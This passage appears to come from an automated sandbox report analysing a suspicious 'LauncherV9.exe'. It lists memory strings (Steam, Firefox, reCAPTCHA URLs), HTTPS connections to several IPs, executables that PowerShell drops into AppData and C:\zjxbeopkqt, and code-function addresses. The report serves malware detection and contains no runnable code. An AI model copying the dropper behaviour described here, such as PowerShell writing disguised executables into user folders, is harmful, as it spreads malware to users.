00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: dll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001324000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000400F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57849
            Source: unknownNetwork traffic detected: HTTP traffic on port 57852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57863
            Source: unknownNetwork traffic detected: HTTP traffic on port 57857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57837
            Source: unknownNetwork traffic detected: HTTP traffic on port 57864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57854
            Source: unknownNetwork traffic detected: HTTP traffic on port 57835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57862
            Source: unknownNetwork traffic detected: HTTP traffic on port 57858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57861
            Source: unknownNetwork traffic detected: HTTP traffic on port 57856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57839 -> 443
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57831 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57832 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57833 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57834 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57836 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57835 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57839 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57842 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57848 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57849 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57852 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57855 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57856 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57857 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57858 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57861 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57862 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57863 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57864 version: TLS 1.2

            System Summary

            barindex
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: jaclo.exe.12.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: dll.exe.15.drStatic PE information: section name:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Service.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\zjxbeopkqt\jaclo.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\dll.exeJump to dropped file
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631A0C00_2_00007FF74631A0C0
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746302DF00_2_00007FF746302DF0
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746306BE00_2_00007FF746306BE0
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463049200_2_00007FF746304920
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463249180_2_00007FF746324918
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746308AD00_2_00007FF746308AD0
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463297180_2_00007FF746329718
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631CF500_2_00007FF74631CF50
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463010000_2_00007FF746301000
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463187D00_2_00007FF7463187D0
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463190880_2_00007FF746319088
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463250280_2_00007FF746325028
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632589C0_2_00007FF74632589C
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463230C40_2_00007FF7463230C4
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463235580_2_00007FF746323558
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463195940_2_00007FF746319594
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631EDBC0_2_00007FF74631EDBC
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463185CC0_2_00007FF7463185CC
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631D6400_2_00007FF74631D640
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632B69C0_2_00007FF74632B69C
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632C69C0_2_00007FF74632C69C
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632A3340_2_00007FF74632A334
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631FB400_2_00007FF74631FB40
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF746323BD80_2_00007FF746323BD8
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632DBAC0_2_00007FF74632DBAC
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74631C3BC0_2_00007FF74631C3BC
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74630D4500_2_00007FF74630D450
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632F1700_2_00007FF74632F170
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463309440_2_00007FF746330944
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632B69C0_2_00007FF74632B69C
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF7463189D40_2_00007FF7463189D4
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BAFD9013_2_00BAFD90
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BB292613_2_00BB2926
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BABAA013_2_00BABAA0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BCBC9013_2_00BCBC90
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BD448013_2_00BD4480
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BC3CE013_2_00BC3CE0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BE1CD013_2_00BE1CD0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BEB01013_2_00BEB010
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BDE05013_2_00BDE050
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BA104013_2_00BA1040
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BEA19013_2_00BEA190
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BCE9E013_2_00BCE9E0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BC6D3013_2_00BC6D30
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BE3D0013_2_00BE3D00
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BAB56013_2_00BAB560
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BAC68013_2_00BAC680
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BAA2D013_2_00BAA2D0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BACED013_2_00BACED0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BC2A3E13_2_00BC2A3E
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BD423013_2_00BD4230
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BB2E2C13_2_00BB2E2C
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BA362413_2_00BA3624
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BEA22013_2_00BEA220
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BE1A7013_2_00BE1A70
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BEB66013_2_00BEB660
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BE625013_2_00BE6250
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BB1E4E13_2_00BB1E4E
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BB324513_2_00BB3245
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BCBF9013_2_00BCBF90
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BA47F213_2_00BA47F2
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BA6FF013_2_00BA6FF0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BA27D013_2_00BA27D0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BA3F1013_2_00BA3F10
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BA8F7013_2_00BA8F70
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BCEF7013_2_00BCEF70
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BCEF5013_2_00BCEF50
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_00BE275013_2_00BE2750
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 13_2_02DC4BD513_2_02DC4BD5
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038C83316_2_0038C833
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039189016_2_00391890
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003810F916_2_003810F9
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037BA5016_2_0037BA50
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00382AF816_2_00382AF8
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B430016_2_003B4300
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039CBA016_2_0039CBA0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003983A016_2_003983A0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003BC3A016_2_003BC3A0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038BCC016_2_0038BCC0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B7DF016_2_003B7DF0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003BCE1016_2_003BCE10
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039FE4016_2_0039FE40
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00385EDA16_2_00385EDA
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037E6D016_2_0037E6D0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039783016_2_00397830
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B583016_2_003B5830
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037104016_2_00371040
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039D92B16_2_0039D92B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039490016_2_00394900
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037B97016_2_0037B970
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039615016_2_00396150
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037D94016_2_0037D940
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037214016_2_00372140
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038218516_2_00382185
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003839D016_2_003839D0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037F9C016_2_0037F9C0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038E21B16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00396A1516_2_00396A15
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00399A7016_2_00399A70
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B525016_2_003B5250
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003952B016_2_003952B0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003B5AA016_2_003B5AA0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003A129016_2_003A1290
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00378A8016_2_00378A80
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003BCAE016_2_003BCAE0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003992C016_2_003992C0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037A32016_2_0037A320
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037C32016_2_0037C320
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038C83316_2_0038C833
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00372B5016_2_00372B50
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00386B8116_2_00386B81
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039F43016_2_0039F430
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_003AF41016_2_003AF410
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039D46016_2_0039D460
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00381C5F16_2_00381C5F
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_00394C9016_2_00394C90
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0039F48916_2_0039F489
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038048316_2_00380483
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037D4D016_2_0037D4D0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038DCDF16_2_0038DCDF
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0037AD2016_2_0037AD20
